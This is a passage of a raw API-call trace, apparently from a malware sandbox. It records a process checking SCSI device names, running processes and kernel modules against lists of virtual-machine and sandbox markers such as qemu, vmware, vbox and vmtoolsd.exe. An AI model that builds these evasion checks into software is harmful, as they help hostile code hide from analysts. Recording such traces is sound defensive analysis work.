lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0213.181] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0213.181] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0213.181] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0213.181] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x7a9f80 [0213.181] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x7a9f80, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x7a9f80, ResultLength=0x19ff48) returned 0x0 [0213.181] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0213.181] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x7aa4e8 [0213.181] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x7aa4e8, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x7aa4e8, ResultLength=0x19ff48) returned 0x0 [0213.182] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0213.182] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0213.182] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0213.182] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0213.182] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0213.183] LocalFree (hMem=0x7aa4e8) returned 0x0 [0213.183] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0213.183] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x7aa4e8 [0213.183] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x7aa4e8, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x7aa4e8, ResultLength=0x19ff48) returned 0x0 [0216.855] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0216.855] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0216.855] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0216.855] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0216.855] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0216.856] LocalFree (hMem=0x7aa4e8) returned 0x0 [0216.940] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0216.940] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x7aa4e8 [0216.940] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x7aa4e8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x7aa4e8, ResultLength=0x19ff48) returned 0x0 [0216.941] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="qemu") returned 0x0 [0216.941] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="virtio") returned 0x0 [0216.941] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vmware") returned 0x0 [0216.941] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vbox") returned 0x0 [0216.941] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="xen") returned 0x0 [0216.941] LocalFree (hMem=0x7aa4e8) returned 0x0 [0216.941] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0216.941] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x7aa4e8 [0216.941] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x7aa4e8, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x7aa4e8, ResultLength=0x19ff48) returned 0x0 [0216.942] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0216.942] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0216.942] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0216.942] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0216.942] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0216.943] LocalFree (hMem=0x7aa4e8) returned 0x0 [0216.943] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0216.943] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x7aa4e8 [0216.943] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x7aa4e8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x7aa4e8, ResultLength=0x19ff48) returned 0x0 [0216.943] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0216.943] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0216.943] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0216.944] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0216.944] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0216.944] LocalFree (hMem=0x7aa4e8) returned 0x0 [0216.945] LocalFree (hMem=0x7a9f80) returned 0x0 [0216.945] NtClose (Handle=0x15c) returned 0x0 [0216.945] LocalFree (hMem=0x7a8190) returned 0x0 [0216.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1ab70) returned 0xc0000004 [0216.948] LocalAlloc (uFlags=0x40, uBytes=0x1bb70) returned 0x1ed2050 [0217.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1ed2050, Length=0x1bb70, ResultLength=0x19ff54 | out: SystemInformation=0x1ed2050, ResultLength=0x19ff54*=0x14bc0) returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0217.067] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.067] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.068] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0217.068] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.069] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.069] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.069] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.069] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.069] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.070] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.070] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0217.071] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0217.071] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.071] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.071] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.071] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0217.071] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0217.073] LocalFree (hMem=0x1ed2050) returned 0x0 [0217.073] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x991c) returned 0xc0000004 [0217.160] LocalAlloc (uFlags=0x40, uBytes=0xa91c) returned 0x1ed2050 [0217.160] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1ed2050, Length=0xa91c, ResultLength=0x19ff54 | out: SystemInformation=0x1ed2050, ResultLength=0x19ff54*=0x991c) returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0217.162] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0217.162] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0217.163] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0217.163] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0217.163] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0217.163] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0217.163] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0217.164] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0217.165] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0217.165] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0217.166] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0217.166] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0217.166] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0217.166] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0217.166] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0217.166] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0217.167] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0217.167] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0217.168] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0217.168] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0217.168] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0217.168] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0217.287] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0217.287] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0217.287] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0217.288] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0217.288] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0217.288] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0217.289] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0217.289] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0217.290] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 